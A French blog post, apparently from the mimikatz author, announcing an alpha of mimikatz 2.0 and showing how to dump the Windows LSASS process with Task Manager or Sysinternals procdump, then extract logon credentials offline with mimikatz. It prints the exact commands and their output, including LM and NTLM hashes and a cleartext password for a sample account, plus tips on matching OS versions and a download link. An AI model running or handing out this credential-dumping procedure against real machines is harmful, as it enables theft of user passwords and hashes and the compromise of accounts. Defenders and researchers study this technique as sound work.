mimikatz
est déjà très facile d’emploi sur place… mais si nous prenions à emporter ?
– « Un minidump de LSASS
et 4 Cocas »
NT 6
Microsoft nous a fait une bonne surprise ! Il est maintenant possible de dumper des processus directement depuis le gestionnaire de tâches, et ceci sans outils supplémentaires !
Nous sommes ensuite remerciés par :
(valable pour Windows Vista et versions supérieures)
NT 5
Cette fois ci, point de méthode interne à Windows, mais nous pouvons passer par Procdump
: http://technet.microsoft.com/sysinternals/dd996900.aspx
C:\WINDOWS\Sysinternals>procdump -accepteula -ma lsass.exe lsass.dmp ProcDump v5.14 - Writes process dump files Copyright (C) 2009-2013 Mark Russinovich Sysinternals - www.sysinternals.com With contributions from Andrew Richards Writing dump file C:\WINDOWS\Sysinternals\lsass.dmp ... Writing 48MB. Estimated time (less than) 1 second. Dump written.
Utilisation
Il suffit maintenant d’utiliser mimikatz
sur une plateforme de même version majeure et de même architecture que le dump d’origine.
Exemples de configurations :
- Dump d’un Windows XP x86 => mimikatz x86 sous Windows 2003 x86
- Dump d’un Vista x64 => mimikatz x64 sous Windows 2012 x64
mimikatz 2.0 alpha x86 release "Kiwi en C" (Apr 2 2013 02:58:12) /* * * Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) http://blog.gentilkiwi.com/mimikatz with 4 modules * * */ mimikatz # sekurlsa::minidump lsass.dmp Switch to MINIDUMP mimikatz # sekurlsa::logonPasswords Authentication Id : 0 ; 141237 User Name : sekur_000 Domain : WINDOWS-8 msv : * Username : sekurlsa@live.fr * Domain : MicrosoftAccount * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a tspkg : * Username : sekurlsa@live.fr * Domain : MicrosoftAccount * Password : waza1234/ wdigest : * Username : sekurlsa@live.fr * Domain : MicrosoftAccount * Password : waza1234/ livessp : * Username : sekurlsa@live.fr * Domain : ps:password * Password : waza1234/ kerberos : ssp :
mimikatz
Oui, il s’agit de mimikatz 2
, une version alpha
livrée totalement incomplète pour l’occasion (et certainement encore pleine de bogues).
Le français n’ayant pas beaucoup freiné certaines utilisations, et à la demande de beaucoup (gasp!), cette version sera en anglais.
La version alpha prenant en charge ces améliorations est disponible : http://blog.gentilkiwi.com/mimikatz (répertoire alpha)
Ping : Using Mimikatz Alpha or Getting Clear Text Passwords with a Microsoft Tool ← Secuirty Mutant
Ping : Using Mimikatz Alpha or Getting Clear Text Passwords with a Microsoft Tool | Lost my password!
Ping : Dumping Windows Credentials | Securus Global Blog
Ping : Mimikatz Minidump and mimikatz via bat file | iSEC Source
Ping : Passwords en claro con Procdump y Mimikatz Alpha | Security Art Work
Ping : Plaintext passwords with Procdump and Mimikatz Alpha | Security Art Work
Ping : 绕过杀软导出明文密码 | A11riseforme's Blog
Ping : Dumping Windows Credentials - Cipher
Ping : Memdumps, Volatility, Mimikatz, VMs – Part 1: Mimikatz & lsass.exe Dump | govolution
Ping : Dumping Windows Credentials - Pure Security
Ping : Как сдампить учетные записи в ОС Windows — КИБЕРВОИН
Ping : ProcDump + Mimikatz Descubriendo contraseñas. – Monster Blog